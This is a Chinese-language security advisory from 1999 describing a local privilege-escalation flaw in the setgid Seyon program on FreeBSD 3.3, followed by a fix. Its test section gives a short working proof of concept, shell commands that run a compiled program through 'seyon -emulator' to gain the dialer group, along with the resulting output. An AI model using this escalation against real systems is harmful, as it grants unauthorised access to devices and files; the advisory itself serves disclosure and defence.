发布日期：1999-12-01
更新日期：1999-12-01

受影响系统：

FreeBSD FreeBSD 3.3

描述：

---

FreeBSD 3.3-RELEASE中的Seyon是一个通讯程序，最近被发现   
存在可以让恶意用户提高权限的漏洞。在FreeBSD中，seyon以setgid dialer   
安装。其后果是，本地用户可以访问通信设备或任何group dialer可以访问的   
文件。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

bash-2.03$ echo ''void main() { system("/usr/bin/id"); }'' > id.c   
bash-2.03$ gcc -o id id.c   
bash-2.03$ seyon -emulator ./id   
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

建议：

---

临时解决办法是去掉seyon的setgid位。

浏览次数：8924
严重程度：0（网友投票）